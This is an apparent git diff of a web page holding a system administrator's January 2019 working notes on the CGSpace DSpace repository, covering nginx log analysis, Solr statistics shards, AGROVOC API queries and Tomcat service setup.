<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -141,7 +141,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -155,20 +155,20 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
</code></pre><ul>
<li>Analyzing the types of requests made by the top few IPs during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 54.70.40.11 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 54.70.40.11 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
30 bitstream
534 discover
352 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 207.46.13.1 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 207.46.13.1 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
194 bitstream
345 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 46.101.86.248 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 46.101.86.248 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
261 handle
</code></pre><ul>
<li>It&rsquo;s not clear to me what was causing the outbound traffic spike</li>
<li>Oh nice! The once-per-year cron job for rotating the Solr statistics actually worked now (for the first time ever!):</li>
</ul>
<pre><code>Moving: 81742 into core statistics-2010
<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
Moving: 1837285 into core statistics-2011
Moving: 3764612 into core statistics-2012
Moving: 4557946 into core statistics-2013
@ -185,7 +185,7 @@ Moving: 18497180 into core statistics-2018
<ul>
<li>Update local Docker image for DSpace PostgreSQL, re-using the existing data volume:</li>
</ul>
<pre><code>$ sudo docker pull postgres:9.6-alpine
<pre tabindex="0"><code>$ sudo docker pull postgres:9.6-alpine
$ sudo docker rm dspacedb
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
@ -197,7 +197,7 @@ $ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/d
</li>
<li>The JSPUI application—which Listings and Reports depends upon—also does not load, though the error is perhaps unrelated:</li>
</ul>
<pre><code>2019-01-03 14:45:21,727 INFO org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
<pre tabindex="0"><code>2019-01-03 14:45:21,727 INFO org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
2019-01-03 14:45:21,971 INFO org.dspace.app.webui.discovery.DiscoverUtility @ facets for scope, null: 23
2019-01-03 14:45:22,115 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=9471D72242DAA05BCC87734FE3C66EA6:internal_error:-- URL Was: http://localhost:8080/jspui/internal-error
-- Method: GET
@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<ul>
<li>Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don&rsquo;t see anything around that time in the web server logs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Jan/2019:1(7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Jan/2019:1(7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 207.46.13.192
217 31.6.77.23
340 66.249.70.29
@ -298,7 +298,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<li>I&rsquo;m thinking about trying to validate our <code>dc.subject</code> terms against <a href="http://aims.fao.org/agrovoc/webservices">AGROVOC webservices</a></li>
<li>There seem to be a few APIs and the documentation is kinda confusing, but I found this REST endpoint that does work well, for example searching for <code>SOIL</code>:</li>
</ul>
<pre><code>$ http http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en
<pre tabindex="0"><code>$ http http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: Keep-Alive
@ -313,39 +313,39 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [
&#34;results&#34;: [
{
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;soil&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;soil&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_7156&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_7156&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
}
],
&quot;uri&quot;: &quot;&quot;
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>The API does not appear to be case sensitive (searches for <code>SOIL</code> and <code>soil</code> return the same thing)</li>
<li>I&rsquo;m a bit confused that there&rsquo;s no obvious return code or status when a term is not found, for example <code>SOILS</code>:</li>
</ul>
<pre><code>HTTP/1.1 200 OK
<pre tabindex="0"><code>HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: Keep-Alive
Content-Length: 367
@ -359,55 +359,55 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [],
&quot;uri&quot;: &quot;&quot;
&#34;results&#34;: [],
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>I guess the <code>results</code> object will just be empty&hellip;</li>
<li>Another way would be to try with SPARQL, perhaps using the Python 2.7 <a href="https://pypi.org/project/sparql-client/">sparql-client</a>:</li>
</ul>
<pre><code>$ python2.7 -m virtualenv /tmp/sparql
<pre tabindex="0"><code>$ python2.7 -m virtualenv /tmp/sparql
$ . /tmp/sparql/bin/activate
$ pip install sparql-client ipython
$ ipython
In [10]: import sparql
In [11]: s = sparql.Service(&quot;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&quot;, &quot;utf-8&quot;, &quot;GET&quot;)
In [12]: statement=('PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; '
...: 'SELECT '
...: '?label '
...: 'WHERE { '
...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
...: 'FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) . '
...: '} LIMIT 10')
In [11]: s = sparql.Service(&#34;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&#34;, &#34;utf-8&#34;, &#34;GET&#34;)
In [12]: statement=(&#39;PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; &#39;
...: &#39;SELECT &#39;
...: &#39;?label &#39;
...: &#39;WHERE { &#39;
...: &#39;{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } &#39;
...: &#39;FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) . &#39;
...: &#39;} LIMIT 10&#39;)
In [13]: result = s.query(statement)
In [14]: for row in result.fetchone():
...: print(row)
...:
(&lt;Literal &quot;fish catching&quot;@en&gt;,)
(&lt;Literal &quot;fish harvesting&quot;@en&gt;,)
(&lt;Literal &quot;fish meat&quot;@en&gt;,)
(&lt;Literal &quot;fish roe&quot;@en&gt;,)
(&lt;Literal &quot;fish conversion&quot;@en&gt;,)
(&lt;Literal &quot;fisheries catches (composition)&quot;@en&gt;,)
(&lt;Literal &quot;fishtail palm&quot;@en&gt;,)
(&lt;Literal &quot;fishflies&quot;@en&gt;,)
(&lt;Literal &quot;fishery biology&quot;@en&gt;,)
(&lt;Literal &quot;fish production&quot;@en&gt;,)
(&lt;Literal &#34;fish catching&#34;@en&gt;,)
(&lt;Literal &#34;fish harvesting&#34;@en&gt;,)
(&lt;Literal &#34;fish meat&#34;@en&gt;,)
(&lt;Literal &#34;fish roe&#34;@en&gt;,)
(&lt;Literal &#34;fish conversion&#34;@en&gt;,)
(&lt;Literal &#34;fisheries catches (composition)&#34;@en&gt;,)
(&lt;Literal &#34;fishtail palm&#34;@en&gt;,)
(&lt;Literal &#34;fishflies&#34;@en&gt;,)
(&lt;Literal &#34;fishery biology&#34;@en&gt;,)
(&lt;Literal &#34;fish production&#34;@en&gt;,)
</code></pre><ul>
<li>The SPARQL query comes from my notes in <a href="/cgspace-notes/2017-08/">2017-08</a></li>
</ul>
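<ul>
<li>Going back to the REST approach, a minimal Python sketch of validating a term by checking for an empty <code>results</code> list (the <code>agrovoc_term_exists</code> helper and the use of the requests library here are just an illustration):</li>
</ul>
<pre tabindex="0"><code># Minimal sketch: the API returns HTTP 200 whether or not the term is found,
# so the only signal is whether the &#34;results&#34; list is empty
import requests

def agrovoc_term_exists(term, lang=&#34;en&#34;):
    url = &#34;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search&#34;
    response = requests.get(url, params={&#34;query&#34;: term, &#34;lang&#34;: lang})
    response.raise_for_status()
    return len(response.json()[&#34;results&#34;]) &gt; 0

print(agrovoc_term_exists(&#34;SOIL&#34;))   # True
print(agrovoc_term_exists(&#34;SOILS&#34;))  # False
</code></pre>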
@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
</li>
<li>I am testing the speed of the WorldFish DSpace repository&rsquo;s REST API and it&rsquo;s five to ten times faster than CGSpace as I tested in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre><code>$ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
0.16s user 0.03s system 3% cpu 5.185 total
0.17s user 0.02s system 2% cpu 7.123 total
@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
</code></pre><ul>
<li>In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;14/Jan/2019:(17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;14/Jan/2019:(17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 31.6.77.23
192 54.70.40.11
202 66.249.64.157
@ -599,11 +599,11 @@ In [14]: for row in result.fetchone():
<ul>
<li>In the Solr admin UI I see the following error:</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>Looking in the Solr log I see this:</li>
</ul>
<pre><code>2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
<pre tabindex="0"><code>2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For 2019-01 alone the Usage Stats are already around 1.2 million</li>
<li>I tried to look in the nginx logs to see how many raw requests there are so far this month and it&rsquo;s about 1.4 million:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
1442874
real 0m17.161s
@ -786,7 +786,7 @@ sys 0m2.396s
<ul>
<li>That&rsquo;s weird, I logged into DSpace Test (linode19) and it says it has been up for 213 days:</li>
</ul>
<pre><code># w
<pre tabindex="0"><code># w
04:46:14 up 213 days, 7:25, 4 users, load average: 1.94, 1.50, 1.35
</code></pre><ul>
<li>I&rsquo;ve definitely rebooted it several times in the past few months&hellip; according to <code>journalctl -b</code> it was a few weeks ago on 2019-01-02</li>
@ -803,7 +803,7 @@ sys 0m2.396s
<li>Investigating running Tomcat 7 on Ubuntu 18.04 with the tarball and a custom systemd package instead of waiting for our DSpace to get compatible with Ubuntu 18.04&rsquo;s Tomcat 8.5</li>
<li>I could either run with a simple <code>tomcat7.service</code> like this:</li>
</ul>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=Apache Tomcat 7 Web Application Container
After=network.target
[Service]
@ -817,7 +817,7 @@ WantedBy=multi-user.target
</code></pre><ul>
<li>Or try to adapt a real systemd service like Arch Linux&rsquo;s:</li>
</ul>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=Tomcat 7 servlet container
After=network.target
@ -859,48 +859,48 @@ WantedBy=multi-user.target
<li>I think I might manage this the same way I do the restic releases in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>, where I download a specific version and symlink to some generic location without the version number</li>
<li>I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;33&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;33&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>I opened an issue on the GitHub issue tracker (<a href="https://github.com/ilri/dspace-statistics-api/issues/10">#10</a>)</li>
<li>I don&rsquo;t think the <a href="https://solrclient.readthedocs.io/en/latest/">SolrClient library</a> we are currently using supports these types of queries, so we might have to just do raw queries with requests</li>
<li>The <a href="https://github.com/django-haystack/pysolr">pysolr</a> library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):</li>
</ul>
<pre><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
print(results.facets['facet_fields'])
{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;, &#39;facet&#39;: &#39;true&#39;, &#39;facet.field&#39;: &#39;id&#39;, &#39;facet.mincount&#39;: 1, &#39;facet.limit&#39;: 10, &#39;facet.offset&#39;: 0, &#39;rows&#39;: 0})
print(results.facets[&#39;facet_fields&#39;])
{&#39;id&#39;: [&#39;77572&#39;, 646, &#39;93185&#39;, 380, &#39;92932&#39;, 375, &#39;102499&#39;, 372, &#39;101430&#39;, 337, &#39;77632&#39;, 331, &#39;102449&#39;, 289, &#39;102485&#39;, 276, &#39;100849&#39;, 270, &#39;47080&#39;, 260]}
</code></pre><ul>
<li>If I double check one item from above, for example <code>77572</code>, it appears this is only working on the current statistics core and not the shards:</li>
</ul>
<pre><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
646
solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics-2018/&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
595
</code></pre><ul>
<li>So I guess I need to figure out how to use join queries and maybe even switch to using raw Python requests with JSON</li>
<li>This enumerates the list of Solr cores and returns JSON format:</li>
</ul>
<pre><code>http://localhost:3000/solr/admin/cores?action=STATUS&amp;wt=json
<pre tabindex="0"><code>http://localhost:3000/solr/admin/cores?action=STATUS&amp;wt=json
</code></pre><ul>
<li>I think I figured out how to search across shards; I needed to give the full URL of each of the other cores</li>
<li>Now I get more results when I start adding the other statistics cores:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound&lt;result name=&quot;response&quot; numFound=&quot;2061320&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;16280292&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;25606142&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;31532212&quot; start=&quot;0&quot; maxScore=&quot;1.0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound&lt;result name=&#34;response&#34; numFound=&#34;2061320&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;16280292&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;25606142&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;31532212&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
</code></pre><ul>
<li>I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the <code>shards</code> parameter to each query to make the search distributed among the cores</li>
<li>I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a <code>shards</code> query string</li>
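<li>A rough sketch of that idea (the URL, names, and example query below are illustrative, not the actual dspace-statistics-api code):</li>
</ul>
<pre tabindex="0"><code># Illustrative sketch: enumerate Solr cores via the CoreAdmin STATUS action and
# build a &#34;shards&#34; parameter so the statistics query is distributed across all cores
import requests

solr_url = &#34;http://localhost:8081/solr&#34;  # example URL

status = requests.get(
    solr_url + &#34;/admin/cores&#34;, params={&#34;action&#34;: &#34;STATUS&#34;, &#34;wt&#34;: &#34;json&#34;}
).json()
statistics_cores = [name for name in status[&#34;status&#34;] if name.startswith(&#34;statistics&#34;)]

# Solr expects shards as host:port/solr/core, without the http:// scheme
solr_host = solr_url.replace(&#34;http://&#34;, &#34;&#34;)
shards = &#34;,&#34;.join(solr_host + &#34;/&#34; + core for core in statistics_cores)

params = {
    &#34;q&#34;: &#34;type:2 id:11576&#34;,
    &#34;fq&#34;: [&#34;isBot:false&#34;, &#34;statistics_type:view&#34;],
    &#34;rows&#34;: 0,
    &#34;shards&#34;: shards,
    &#34;wt&#34;: &#34;json&#34;,
}
docs = requests.get(solr_url + &#34;/statistics/select&#34;, params=params).json()
print(docs[&#34;response&#34;][&#34;numFound&#34;])
</code></pre>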
@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/
</ul>
</li>
</ul>
<pre><code>$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;275&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
$ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot; maxScore=&quot;12.205825&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;275&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
</code></pre><h2 id="2019-01-22">2019-01-22</h2>
<ul>
<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v0.9.0">version 0.9.0 of the dspace-statistics-api</a> to address the issue of querying multiple Solr statistics shards</li>
@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>I deployed it on CGSpace (linode18) and restarted the indexer as well</li>
<li>Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Jan/2019:1(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Jan/2019:1(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
155 40.77.167.106
